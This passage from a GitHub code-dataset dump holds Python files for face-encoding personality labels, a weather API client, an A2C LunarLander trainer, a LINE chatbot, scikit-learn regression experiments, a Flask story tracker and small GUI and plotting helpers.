ShortVideoName = []\n for videoName in videoNames.values:\n ShortVideoName.append(videoName.split('.')[0])\n return ShortVideoName\n\ndef create_mean_video_name_df(df):\n cols = ['ValueExtraversion','ValueAgreeableness','ValueConscientiousness','ValueNeurotisicm','ValueOpenness','ShortVideoName']\n grouped_df = df[cols].groupby('ShortVideoName')\n mean_df = grouped_df.mean()\n mean_df = mean_df.reset_index()\n return mean_df\n\n\ndef create_dataset_ChaLearn(images_path, end_path):\n create_new_data_directories(end_path)\n df = pd.read_csv(LocationConfig.labels + 'bigfive_labels.csv')\n\n df['ShortVideoName'] = get_short_video_name(df['VideoName'])\n\n mean_df = create_mean_video_name_df(df)\n mean_df.to_csv(LocationConfig.labels + 'bigfive_labels_mean.csv')\n df = mean_df.set_index('ShortVideoName')\n all_x = np.array(df.index)\n X_train, X_test = train_test_split(\n all_x, \n test_size=CreateDataConfig.test_size_ratio,\n random_state=0\n )\n\n images_dict_train = {'X':[], 'Y':[]}\n images_dict_test = {'X':[], 'Y':[]}\n total_files = len(fnmatch.filter(os.listdir(images_path), '*.jpg'))\n\n for image_path in tqdm(Path(images_path).glob('*.jpg'), total=total_files):\n img = face_recognition.load_image_file(str(image_path))\n face_locations = face_recognition.face_locations(img, model=\"cnn\")\n codes = face_recognition.face_encodings(img, known_face_locations=face_locations, model=\"large\")\n if len(codes) < 1:\n continue\n image_group = image_path.name.split('.')[0]\n Y = df.loc[image_group].values\n image_no = image_path.name.split('.')[2][-5:]\n if CreateDataConfig.classification:\n Y = list(np.where(Y>CreateDataConfig.Y_threshold, 1, 0))\n if image_group in X_test:\n images_dict_test['X'].append(codes[0])\n# images_dict_test['X'].append(img)\n images_dict_test['Y'].append(Y)\n else:\n images_dict_train['X'].append(codes[0])\n# images_dict_train['X'].append(img)\n images_dict_train['Y'].append(Y)\n \n with open(end_path + 'train/train.pickle', 'wb') as handle:\n pickle.dump(images_dict_train, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(end_path + 'test/test.pickle', 'wb') as handle:\n pickle.dump(images_dict_test, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \ncreate_dataset_ChaLearn(LocationConfig.crop_images, LocationConfig.enc)","repo_name":"Krl1/PersonalityPrediction","sub_path":"transf.py","file_name":"transf.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72600689752","text":"import json\nimport os\nimport logging\nimport requests\nimport gzip\n\nfrom src.data.enums import Constants\n\n\ndef download_city_list():\n url = \"https://bulk.openweathermap.org/sample/current.city.list.json.gz\"\n city_list = requests.get(url)\n if not os.path.exists(Constants.CITY_LIST.value):\n logging.info('Downloading city list from source')\n with open(Constants.CITY_LIST_GZ.value, 'wb') as file:\n file.write(city_list.content)\n block_size = 65536\n with gzip.open(Constants.CITY_LIST_GZ.value, 'rb') as source, \\\n open(Constants.CITY_LIST.value, 'wb') as dest:\n while True:\n block = source.read(block_size)\n if not block:\n break\n else:\n dest.write(block)\n os.remove(Constants.CITY_LIST_GZ.value)\n\n\nclass Weather:\n \"\"\"This class manages weather info through the OpenWeatherMap API\"\"\"\n\n api_key = os.environ.get('OPENWEATHERMAP_ID')\n\n def __init__(self, city):\n self.city = city\n download_city_list()\n\n def weather_info(self):\n \"\"\"\n :return: the weather info in json format\n \"\"\"\n logging.info('Getting weather info...')\n with open(Constants.CITY_LIST.value, 'r', encoding='utf-8') as file:\n cities = json.load(file)\n url = \"https://api.openweathermap.org/data/2.5/weather?id=%s&appid=%s&lang=%s&units=metric\" % (\n self.get_city_id(cities), self.api_key, \"hu\")\n response = requests.get(url)\n return json.loads(response.text)\n\n def get_city_id(self, cities):\n to_return_id = None\n for city in cities:\n if city['name'] == self.city:\n to_return_id = city['id']\n return to_return_id\n\n\nif __name__ == \"__main__\":\n w = Weather('Budapest')\n print(w.weather_info())\n","repo_name":"D3w4r/myradio","sub_path":"src/data/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43431982538","text":"from __future__ import print_function\n\nimport os\n\nimport sys\nimport argparse\nimport numpy as np\nnp.random.seed(0)\nimport pickle as pkl\nimport tensorflow as tf\nimport keras\nfrom keras.optimizers import Adam\nfrom keras.callbacks import TensorBoard\n\nimport gym\nfrom gym import wrappers\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom time import time\nimport pickle as pkl\n\nimport math\n\n\ndef write_log(callback, names, logs, batch_no):\n for name, value in zip(names, logs):\n summary = tf.Summary()\n summary_value = summary.value.add()\n summary_value.simple_value = value\n summary_value.tag = name\n callback.writer.add_summary(summary, batch_no)\n callback.writer.flush()\n\nclass A2C():\n def __init__(self, env, args):\n self.env = env\n self.args = args\n self.nS = self.env.observation_space.shape[0]\n self.nA = self.env.action_space.n\n\n with open(self.args.model_config_path, 'r') as f:\n shared_model = keras.models.model_from_json(f.read()) \n shared_model.pop()\n\n kernel = keras.initializers.VarianceScaling(scale=1.0, mode='fan_avg', \n distribution='normal', seed=None)\n actor_model = keras.layers.Dense(self.nA, activation='softmax', name='act_output', \n kernel_initializer= kernel)\n critic_model = keras.layers.Dense(1, activation='linear', name='crit_output', \n kernel_initializer= kernel)\n\n state_input = keras.layers.Input(shape=(self.nS,), name='state_input')\n shared_output = shared_model(state_input)\n actor_output = actor_model(shared_output)\n critic_output = critic_model(shared_output)\n\n self.model = keras.models.Model(inputs=state_input, outputs=[actor_output, critic_output])\n\n if self.args.mode=='train' and self.args.resume:\n print('*'*80)\n print ('Resuming Training from last Checkpoint')\n print('*'*80)\n best_model_path = sorted([int(ep) for ep in os.listdir(self.args.model_path)])[-1]\n self.model.load_weights(os.path.join(self.args.model_path, str(best_model_path)))\n self.episodes_done = best_model_path\n else:\n self.episodes_done = 0\n\n self.n = args.n\n self.lr = args.lr\n self.gamma = args.gamma\n\n def truncated_discounted_rewards(self, rewards):\n \n batch_size = len(rewards)-self.n\n truncated_rewards = np.zeros(batch_size)\n for t in range(batch_size):\n cumulative = 0\n for i in range(0, self.n):\n cumulative += math.pow(self.gamma, i)*rewards[t + i]\n truncated_rewards[t] = cumulative\n return truncated_rewards\n\n def get_value_reward(self, states, rewards, values):\n\n extended_values = values + [0]*self.n\n extended_rewards = rewards + [0]*self.n\n truncated_discounted_rewards = self.truncated_discounted_rewards(extended_rewards)\n batch_size = len(rewards)\n discounted_rewards = np.zeros_like(rewards)\n for t in reversed(range(batch_size)):\n discounted_rewards[t] = math.pow(self.gamma,self.n)*extended_values[t+self.n] + \\\n truncated_discounted_rewards[t]\n return discounted_rewards\n\n\n def train(self):\n \n if self.args.optimizer == \"adam\":\n self.optimizer = Adam(lr = self.args.lr)\n \n self.model.compile(optimizer='rmsprop',\n loss={'act_output': 'categorical_crossentropy', 'crit_output': 'mean_squared_error'},\n loss_weights={'act_output': 1., 'crit_output': 0.2})\n \n total_act_loss = []\n total_crit_loss = []\n all_rewards = []\n\n tensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\n train_names = ['metric' , 'actor_loss', 'critic_loss']\n val_names = ['val_metric', 'val_actor_loss', 'val_critic_loss']\n tensorboard.set_model(self.model)\n\n for episode in range(self.episodes_done ,self.args.num_episodes):\n print(\"Training episode {0}\".format(episode))\n ## Generate Episode\n states, actions, rewards, values = self.generate_episode(self.env, self.args.render)\n discounted_rewards = self.get_value_reward(states, rewards, values)\n\n states = np.array(states)\n act_target = np.zeros((len(states),self.nA))\n act_target[np.arange(len(states)), np.array(actions)] = (np.array(discounted_rewards) \n - np.array(values))\n\n crit_target = np.array(discounted_rewards)\n\n metric , act_loss, crit_loss = self.model.train_on_batch(states, {'act_output': act_target,\n 'crit_output': crit_target}, )\n logs = [metric, act_loss, crit_loss]\n write_log(tensorboard, train_names, logs, episode)\n\n total_act_loss.append(act_loss)\n total_crit_loss.append(crit_loss)\n all_rewards.append(np.sum(rewards)*1e2)\n\n\n if (episode + 1) % self.args.log_every == 0:\n if self.args.verbose:\n print(\"Num Episodes: {0}, Train Reward: {1} +/- {2}, Act Loss: {3}, Crit Loss: {4}\".\n format(episode+1, np.mean(all_rewards), np.std(all_rewards), \n np.mean(total_act_loss), np.mean(total_crit_loss)))\n total_act_loss = []\n total_crit_loss = []\n all_rewards = []\n \n if (not self.args.trial) and(episode + 1) % self.args.eval_after == 0:\n if self.args.verbose:\n print(\"Saving Model Weights\")\n self.model.save_weights(os.path.join(self.args.model_path, str(episode+1)))\n\n sys.stdout.flush()\n\n \n def test_episode(self, num_test_episodes = 100):\n all_rewards = [] \n for i in range(num_test_episodes):\n _ ,_ , rewards, _ = self.generate_episode(self.env, self.args.render)\n episode_reward = np.sum(rewards)\n all_rewards.append(episode_reward*1e2)\n \n average_reward = np.mean(all_rewards)\n std_reward = np.std(all_rewards)\n return average_reward, std_reward\n \n def test(self):\n trained_episodes = sorted([int(ep) for ep in os.listdir(self.args.model_path)])\n performance = []\n for episode in trained_episodes:\n self.model.load_weights(os.path.join(self.args.model_path, str(episode)))\n average_reward, std_reward = self.test_episode()\n performance.append([episode, average_reward, std_reward])\n print('*'*80)\n print(\"Average reward after {0} episodes: {1} +/- {2}\".format(episode, \n average_reward, std_reward))\n print('*'*80)\n self.plot_performance(performance)\n\n def test_single(self, episode):\n if self.args.render:\n self.env = wrappers.Monitor(self.env, self.args.video_path,\n video_callable=lambda episode_id: True, force=True)\n\n self.model.load_weights(os.path.join(self.args.model_path, str(episode)))\n all_rewards = []\n for i in range(self.args.num_test_episodes):\n _, _, rewards, _ = self.generate_episode(self.env, self.args.render)\n episode_reward = np.sum(rewards)\n all_rewards.append(episode_reward*100)\n\n average_reward = np.mean(all_rewards)\n std_reward = np.std(all_rewards)\n return average_reward, std_reward\n\n\n def generate_episode(self, env, model, render = False):\n \n states = []\n actions = []\n rewards = []\n values = []\n \n current_state = env.reset()\n is_terminal = False\n while not is_terminal:\n action_distribution, cricval = self.model.predict(np.expand_dims(current_state, 0))\n action = np.random.choice(env.action_space.n, 1, \n p=action_distribution.squeeze(0))[0]\n next_state, reward, is_terminal, _ = env.step(action)\n states.append(current_state)\n actions.append(action)\n rewards.append(reward*1e-2)\n values.append(cricval.squeeze(0)[0])\n current_state = next_state\n \n return states, actions, rewards, values\n \n def plot_performance(self, performance):\n \n X = [x[0] for x in performance]\n Y = [x[1] for x in performance]\n Z = [x[2] for x in performance]\n\n plt.figure()\n plt.errorbar(X, Y, yerr = Z, ecolor='r', capsize = 2)\n plt.axhline(y=200, linestyle='--')\n plt.xlabel('Episodes')\n plt.ylabel('Average Reward')\n plt.title(\"Performance of A2C Algorithm (n=\"+str(self.args.n)+\") on Lunar Lander\")\n plt.savefig(self.args.plot_path,dpi = 200)\n\n\ndef parse_arguments():\n \n parser = argparse.ArgumentParser()\n\n parser.add_argument('--model-config-path', dest='model_config_path', type=str,\n default='LunarLander-v2-config.json',\n help=\"Path to the model config file.\")\n parser.add_argument('--result_path', dest='result_path',type=str, \n default='a2c_keras',\n help=\"Path to the model.\")\n parser.add_argument('--video_path', dest='video_path',type=str,\n default='a2c_keras/videos/ ',\n help=\"Path to the video folder.\")\n parser.add_argument('--resume', dest='resume', type=int, default=0, \n help=\"Resume the training from last checkpoint\")\n\n parser.add_argument('--num-episodes', dest='num_episodes', type=int, \n default=50000, \n help=\"Number of episodes to train on.\")\n parser.add_argument('--eval_after', dest='eval_after', type=int, \n default=500, \n help=\"Number of episodes to evaluate after.\")\n parser.add_argument('--log_every', dest='log_every', type=int, \n default=25, \n help=\"Number of episodes to log after.\")\n parser.add_argument('--gamma', type=float, dest='gamma', \n default = 1)\n \n parser.add_argument('--run', type=int, dest='run', default=1)\n parser.add_argument('--seed', type=int, dest='seed', default=0)\n parser.add_argument('--episode_number', type=int, dest='episode_number', default=0)\n parser.add_argument('--num_test_episodes', type=int, dest='num_test_episodes', default=1)\n parser.add_argument('--trial', dest='trial', action='store_true',\n help=\"If it is just a trial\")\n parser.add_argument('--verbose', dest='verbose', action='store_true',\n help=\"Whether to print loss after every episode.\")\n parser.add_argument('--mode', type=str, dest='mode', \n default='train',\n help=\"Optimizer to be Used\")\n \n parser_group = parser.add_mutually_exclusive_group(required=False)\n parser_group.add_argument('--render', dest='render', \n action='store_true',\n help=\"Whether to render the environment.\")\n parser_group.add_argument('--no-render', dest='render', \n action='store_false',\n help=\"Whether to render the environment.\")\n parser.set_defaults(render=False)\n\n parser.add_argument('--n', dest='n', type=int,\n default=100, help=\"The value of N in N-step A2C.\")\n parser.add_argument('--lr', dest='lr', type=float, default=1e-3, \n help=\"The learning rate.\")\n parser.add_argument('--optimizer', type=str, dest='optimizer', \n default='adam', help=\"Optimizer to be Used\")\n \n args = parser.parse_args()\n \n if not os.path.exists(args.result_path):\n os.makedirs(args.result_path)\n \n args.model_path = os.path.join(args.result_path, \n 'a2c_model' +str(args.run) + '_' + str(args.n))\n \n if not os.path.exists(args.model_path):\n os.makedirs(args.model_path)\n \n args.plot_path = os.path.join(args.result_path, 'a2c_plot' +str(args.run) + \n '_' + str(args.n) + '.png')\n \n return args\n\n\ndef main(args):\n \n # Parse command-line arguments.\n args = parse_arguments()\n \n # Create the environment.\n env = gym.make('LunarLander-v2')\n env.seed(args.seed)\n \n a2c = A2C(env, args)\n\n # best model at;\n # best_model_path = sorted([int(ep) for ep in os.listdir(args.model_path)])[-1]\n\n if args.mode == 'train':\n a2c.train()\n \n elif args.mode == 'test':\n a2c.test()\n elif args.mode == 'video':\n average_reward, std_reward = a2c.test_single(args.episode_number)\n print(average_reward, std_reward)\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"bhargaviparanjape/A2C","sub_path":"src/a2c_keras.py","file_name":"a2c_keras.py","file_ext":"py","file_size_in_byte":13354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"71115691991","text":"#這些是LINE官方開放的套件組合透過import來套用這個檔案上\r\nfrom linebot import (LineBotApi, WebhookHandler)\r\nfrom linebot.exceptions import (InvalidSignatureError)\r\nfrom linebot.models import *\r\nfrom User import *\r\nimport json\r\nfrom linebot.models import QuickReply, QuickReplyButton, MessageAction\r\n\r\ndef quick_reply(words: list):\r\n tags = list()\r\n for word in words:\r\n tags.append(QuickReplyButton(\r\n action=MessageAction(label=word,text=word)\r\n ))\r\n return QuickReply(items=tags)\r\n\r\ndef follow_event_message():\r\n return TextSendMessage(text='Hi! My name is Ric. You can click \\\"About Me\\\" and choose the following squares to know me more.')\r\n\r\ndef text_msg(user, msg):\r\n if msg.lower() == 'basic info':\r\n user.state = 1\r\n message = list()\r\n message.append(TextSendMessage(text=\"I major in Electrical Engineering. I got GPA: 4.17/4.30 in last semester and I am also the TA of Signals and Systems.\\nThe following is my CV.\"))\r\n FlexMessage = json.load(open('Basicinfo_CV.json','r',encoding='utf-8'))\r\n message.append(FlexSendMessage('Basicinfo_CV', FlexMessage))\r\n return message\r\n elif msg.lower() == 'side project':\r\n user.state = 2\r\n message = list()\r\n message.append(TextSendMessage(text='I like to discover the inconvenience in our daily life. These following side projects are designed by myself, using the knowledge which learned in the class and built in my own free time.'))\r\n FlexMessage = json.load(open('Sideproject.json','r',encoding='utf-8'))\r\n message.append(FlexSendMessage('Sideproject', FlexMessage))\r\n return message\r\n elif msg.lower() == 'course':\r\n user.state = 3\r\n FlexMessage = json.load(open('Course.json','r',encoding='utf-8'))\r\n return FlexSendMessage('Course',FlexMessage)\r\n elif msg.lower() == 'skills':\r\n user.state = 4\r\n image_message = ImageSendMessage(\r\n original_content_url='https://i.imgur.com/qmzi3q8.jpg',\r\n preview_image_url='https://i.imgur.com/qmzi3q8.jpg'\r\n )\r\n return image_message\r\n elif msg.lower() == 'contact':\r\n user.state = 5\r\n FlexMessage = json.load(open('Contact.json','r',encoding='utf-8'))\r\n return FlexSendMessage('Contact info',FlexMessage)\r\n elif msg.lower() == 'activities':\r\n user.state = 6\r\n FlexMessage = json.load(open('Activities.json','r',encoding='utf-8'))\r\n return FlexSendMessage('Activities',FlexMessage)\r\n else:\r\n return TextSendMessage(\r\n text='Hi, If you wanna know me more, please click one topic that you are interested with.',\r\n quick_reply=quick_reply(['Basic Info', 'Side Project', 'Course', 'Skills', 'Contact', 'Activities'])\r\n )\r\n\r\n","repo_name":"cornliu/Self-introduction-linebot","sub_path":"message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37658088616","text":"#! /usr/bin/env python3\n# General system\nimport os\nimport itertools\nimport typer\nfrom datetime import datetime\nfrom pathlib import Path\n\n# General Research libbraries\nimport numpy as np\nimport pandas as pd\n\n# Presentation options\nfrom rich import print\nfrom rich.console import Group\nfrom rich.panel import Panel\nfrom rich.live import Live, Console\nfrom rich.progress import (\n Progress,\n BarColumn,\n SpinnerColumn,\n TextColumn,\n TimeElapsedColumn,\n)\n\n\n# Machine Learning libraries\nfrom sklearn.base import clone\nfrom sklearn.preprocessing import Normalizer, StandardScaler\nfrom sklearn.decomposition import PCA, FastICA\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.linear_model import SGDRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble import (\n BaggingRegressor,\n GradientBoostingRegressor,\n RandomForestRegressor,\n)\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.model_selection import KFold, cross_validate\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.impute import KNNImputer\nfrom sklearn.feature_selection import (\n SelectPercentile,\n f_regression,\n mutual_info_regression,\n)\n\n# TODO incluir Transformin & Regressorin de sklearn para poder crear las clases y usarlas en el pipeline\n\n\n# Import of own libreries\nfrom .util.cli_report import screen_header, report, report_arguments, report_output\n\n\n# Define the progress bars\noverall_progress = Progress(\n TimeElapsedColumn(), BarColumn(), TextColumn(\"{task.description}\")\n)\n\nexperiment_progress = Progress(TimeElapsedColumn(), TextColumn(\"{task.description}\"))\n\ntraining_progress = Progress(\n TextColumn(\"{task.description}\"), SpinnerColumn(\"dots\"), BarColumn()\n)\npartition_progress = Progress(TimeElapsedColumn(), TextColumn(\"{task.description}\"))\n\ngroup_progress = Group(\n Panel(partition_progress, width=80, title=\"Partitions...\"),\n Panel(\n Group(experiment_progress, training_progress), width=80, title=\"Experiments...\"\n ),\n overall_progress,\n)\n\n# Basic treatment of the data\nscales = {\n \"Nothing\": None,\n \"Normalization\": Normalizer(),\n \"StandardScaler\": StandardScaler(),\n}\n\n# Define posible preprocessing paths\npreprocesses = {\n \"Nothing\": None,\n \"PCA\": PCA(),\n \"F-score\": SelectPercentile(f_regression, percentile=90),\n \"MI\": SelectPercentile(mutual_info_regression, percentile=90)\n # TODO posibilidad de implementar un autoencoder para reducir la dimanesionalidad\n}\n\n# Define the regressors to be tested\nregressors = {\n \"PLS\": PLSRegression(),\n \"SGDRegressor\": SGDRegressor(),\n \"SVM\": SVR(),\n \"Bagging\": BaggingRegressor(),\n \"Boosting\": GradientBoostingRegressor(),\n \"RandomForest\": RandomForestRegressor(),\n \"MLP\": MLPRegressor(hidden_layer_sizes=(100,), max_iter=1000, early_stopping=True)\n # TODO implementar clase para una red convolucional sencilla\n}\n\n\n@report_arguments(label=None)\ndef load_data(filepath: Path) -> pd.DataFrame:\n \"\"\"\n Load the data from an specific file\n \"\"\"\n if filepath.is_file():\n data = pd.read_excel(filepath, index_col=0)\n return data\n else:\n raise \"No file found in the specific location\"\n\n\n@report_arguments(label=None)\ndef prepare_data(data: pd.DataFrame, n_splits: int, seed=None, index_file=None):\n X = data.iloc[:, 6:]\n y = data.iloc[:, 5].ravel()\n X = X.astype(\"float64\")\n if index_file:\n indexes = np.loadtxt(index_file).astype(\"int\")\n data = data.reset_index()\n splits = (\n (data[indexes != i].index, data[indexes == i].index)\n for i in np.unique(indexes)\n )\n else:\n cv = KFold(n_splits=n_splits, shuffle=True, random_state=seed)\n splits = cv.split(X, y)\n\n return splits, (X, y)\n\n\ndef run_experiments(data, splits):\n # Definir las posibles combinaciones\n experiments = itertools.product(\n scales.keys(), preprocesses.keys(), regressors.keys()\n )\n\n results = pd.DataFrame(columns=[\"scale\", \"preprocess\", \"regressor\", \"R2\", \"RMSE\"])\n\n experiments, test_number = itertools.tee(experiments)\n test_number = len(list(test_number))\n\n X = data[0]\n y = data[1]\n with Live(group_progress):\n id_overall = overall_progress.add_task(\"\", total=test_number)\n id_train_progress = training_progress.add_task(\n \"[red]Training[/red]\", total=None\n )\n completed_experiments = list()\n\n for index, (scale, preprocess, regressor) in enumerate(experiments):\n overall_progress.update(\n id_overall,\n description=f\"{index} of {test_number} Experiments Completed\",\n )\n id_experiment = experiment_progress.add_task(\n f\"[red]({scale}->{preprocess}->{regressor})[/red]\"\n )\n pipeline = make_pipeline(\n scales[scale], preprocesses[preprocess], regressors[regressor]\n )\n pipeline = clone(pipeline)\n splits, cv = itertools.tee(splits)\n # TODO cambiar por el RandomSearchCV\n scores = cross_validate(\n pipeline,\n X,\n y,\n cv=cv,\n scoring=(\"r2\", \"neg_root_mean_squared_error\"),\n return_train_score=True,\n n_jobs=-1,\n )\n results.loc[len(results.index)] = [\n scale,\n preprocess,\n regressor,\n scores[\"test_r2\"],\n scores[\"test_neg_root_mean_squared_error\"],\n ]\n overall_progress.update(id_overall, advance=1)\n experiment_progress.stop_task(id_experiment)\n experiment_progress.update(\n id_experiment,\n description=f\"[green]({scale}->{preprocess}->{regressor}) ✅ [/green]\",\n )\n completed_experiments.append(id_experiment)\n if len(completed_experiments) > 10:\n experiment_progress.update(completed_experiments.pop(0), visible=False)\n # Clear remaining lines in the panel before another run\n for id_experiment in completed_experiments:\n experiment_progress.update(id_experiment, visible=False)\n\n training_progress.update(id_train_progress, visible=False)\n overall_progress.update(id_overall, visible=False)\n\n # Plain the results making a row for each test, it takes care to pair both colunms\n results = results.apply(pd.Series.explode)\n\n return results\n\n\ndef regression(\n datapath: str, seed: int, n_splits: int = 10, output_filename: str = None\n):\n screen_header(\"Setting up the Laboratory\")\n filepath = Path(datapath)\n problem_name = filepath.stem\n partitions_dir = Path(filepath.parent) / \"_partitions_\"\n try:\n data = load_data(filepath)\n except:\n print(\n f\"[bold red]ERROR[/bold red] Unable to load file [yellow] {filepath}[/yellow]\"\n )\n return\n\n screen_header(\"Starting Experiments\")\n results_filename = (\n output_filename\n if output_filename\n else f'{datetime.today().strftime(\"%Y%m%d\")}_{problem_name}_results.xlsx'\n )\n\n origins = np.append(data[\"Origen\"].unique(), None)\n waters = np.append(data[\"Tipo de agua\"].unique(), None)\n with pd.ExcelWriter(results_filename) as writer:\n for origin, water in itertools.product(origins, waters):\n if origin is None:\n origin = \"all\"\n partition = data\n else:\n partition = data[data.Origen == origin]\n\n if water is None:\n water = \"all\"\n else:\n partition = partition[partition[\"Tipo de agua\"] == water]\n\n partition_name = f\"{origin}_{water}\"\n id_partition = partition_progress.add_task(f\"[red]{partition_name}[/red]\")\n if partition.shape[0] > 0:\n partition_file_name = (\n partitions_dir / f\"{problem_name}_{partition_name}.csv\"\n )\n splits, partition = prepare_data(\n partition,\n n_splits=n_splits,\n seed=seed,\n index_file=str(partition_file_name),\n )\n results = run_experiments(partition, splits)\n results.to_excel(writer, f\"{partition_name}_tests\")\n results.groupby([\"scale\", \"preprocess\", \"regressor\"]).agg(\n [\"mean\", \"std\"]\n ).to_excel(writer, f\"{partition_name}\")\n partition_progress.stop_task(id_partition)\n partition_progress.update(\n id_partition, description=f\"[green]{partition_name}[/green]\"\n )\n screen_header(\"Writing the report\")\n report(\"Printing output to\", results_filename)\n\n\nif __name__ == \"__main__\":\n typer.run(regression)\n","repo_name":"ennanco/labML","sub_path":"labml/commands/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10338814371","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nDans ce fichier, je crée la classe world. Cette classe me permettra d'instancier différent monde.\r\nMon monde aura plusieurs variables d'instances, Mais les variables les plus importantes sont la hauteur et la largeur du monde.\r\nLe monde est un repére ortonormmé avec 0')\ndef story(story_id=None):\n csv_loader = file_minator.csv_loader(\"stories.csv\")\n return render_template(\"story.html\", story_id=story_id, stories=csv_loader)\n\n\ndef delete(id_to_delete):\n file_minator.csv_remover(\"stories.csv\", id_to_delete)\n return homepage()\n\n\n@app.route('/list', methods=['POST', 'GET', \"DELETE\"])\ndef post(story_id=None, id_to_delete=None):\n if request.method == \"DELETE\":\n delete_info = request.form['delete']\n print(True)\n loaded_infos = file_minator.csv_loader(\"stories.csv\")\n info1 = request.form['story_title']\n info2 = request.form['user_story'].replace(\"\\r\", ' ').replace(\"\\n\", ' ')\n info3 = request.form['accept_crit'].replace(\"\\r\", \" \").replace(\"\\n\", ' ')\n info4 = request.form['business_value']\n info5 = request.form['estimation']\n info6 = request.form['status']\n bunch_of_new_info = [info1, info2, info3, info4, info5, info6]\n for item in range(len(loaded_infos)):\n if info1 in loaded_infos[item][0]:\n file_minator.csv_remover(\"stories.csv\", loaded_infos[item][0])\n file_minator.csv_saver(\"stories.csv\", bunch_of_new_info)\n return homepage()\n\n\n@app.route('/lofasz')\ndef lofasz():\n return render_template(\"post_story.html\")\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"kotoszo/super-sprinter-3000-annakonda","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72511129111","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 30 19:17:42 2022\n\n@author: NEEL SHAH\n\"\"\"\n\n\nimport pandas as pd\nimport plotly.express as px\n\n#df = pd.read_csv(r'fILE PATH\\FinalCSV.csv')\ndf = pd.read_csv(r'D:\\NSII\\FSI-MAVs\\FinalCSV.csv')\n\ndf = pd.melt(df,id_vars=['PARAMETERS'],var_name='Birds', value_name='Value', \n value_vars = ['Chickadee','Hoopoe','Tern','Pigeon','Lark','Finch','Magpie'], )\n\n\nfig = px.line_polar(df, r='Value', theta='Birds', color='PARAMETERS',line_close=(True),\n line_shape='linear',hover_name='PARAMETERS',hover_data = {'PARAMETERS':False},\n markers=(True), direction='clockwise',start_angle=45)\n\nfig.update_traces(fill = 'toself')\n \nfig.show()\n\n","repo_name":"fedorukben/ornithopter-mavs","sub_path":"radarMap.py","file_name":"radarMap.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41511260671","text":"import customtkinter as ctk\n\nfrom card_field import CardField\n\n\nclass MainFrame(ctk.CTkScrollableFrame):\n def __init__(self, master, **kwargs):\n super().__init__(master, **kwargs)\n self.columns = []\n\nclass ColumnFrame(ctk.CTkScrollableFrame):\n def __init__(self, master, name, id, **kwargs):\n super().__init__(master, **kwargs)\n self.name = name\n self.master = master\n self.id = id\n self.next = None\n self.label = None\n self.cards = []\n self.column_color = kwargs.get('border_color', '#000000')\n self._scrollbar.configure(width=7, border_spacing=1, corner_radius=100)\n\n def asdict(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'cards': {i: card.asdict() for i, card in enumerate(self.cards) if card},\n 'column_color': self.column_color,\n }\n\n def add_card(self, text):\n new_card = CardField(\n self,\n wrap='word',\n border_spacing=2,\n width=225,\n height=100,\n border_width=2,\n font=('Verdana', 12),\n border_color=self.column_color,\n )\n row = len(self.cards)\n new_card.insert('0.0', text)\n new_card.grid(\n row=row, column=0,\n pady=(0, 20),\n )\n new_card.id = row\n self.cards.append(new_card)\n\n def edit_column_name(self, button):\n curr_text = self.label.cget('text')\n dialog = ctk.CTkInputDialog(\n text='Enter a new name for the column', title='Edit Column'\n )\n text = dialog.get_input()\n self.label.configure(text=text.strip() if text else curr_text)\n ","repo_name":"xbandrade/kanban-board","sub_path":"custom_frames.py","file_name":"custom_frames.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29089930113","text":"import numpy as np\n\n\nclass BoundingBox:\n def __init__(self, shape=(0, 0)) -> None:\n self.empty = False\n if shape[0] == 0 and shape[1] == 0:\n self.empty = True\n\n self.accuracy = 1\n self.img_height = shape[0]\n self.img_width = shape[1]\n\n self.x_min = 0\n self.y_min = 0\n self.x_max = 0\n self.y_max = 0\n\n self.x_cent = 0\n self.y_cent = 0\n self.width = 0\n self.height = 0\n self.half_width = 0\n self.half_height = 0\n\n def isEmpty(self):\n return self.empty\n\n def get(self):\n return (self.y_min, self.x_min, self.y_max, self.x_max)\n\n def getRotate180(self):\n y_max = self.img_height - self.y_min\n x_max = self.img_width - self.x_min\n y_min = self.img_height - self.y_max\n x_min = self.img_width - self.x_max\n return (y_min, x_min, y_max, x_max)\n\n def getArea(self):\n return self.width * self.height\n\n def load(self, xmin, ymin, xmax, ymax):\n self.x_min = xmin\n self.y_min = ymin\n self.x_max = xmax\n self.y_max = ymax\n\n def loadYolo(self, data: np.ndarray):\n try:\n if data.shape[0] == 5:\n self.x_cent = int(data[1] * self.img_width)\n self.y_cent = int(data[2] * self.img_height)\n self.width = int(data[3] * self.img_width)\n self.height = int(data[4] * self.img_height)\n elif data.shape[0] == 6:\n self.accuracy = data[1]\n self.x_cent = int(data[2] * self.img_width)\n self.y_cent = int(data[3] * self.img_height)\n self.width = int(data[4] * 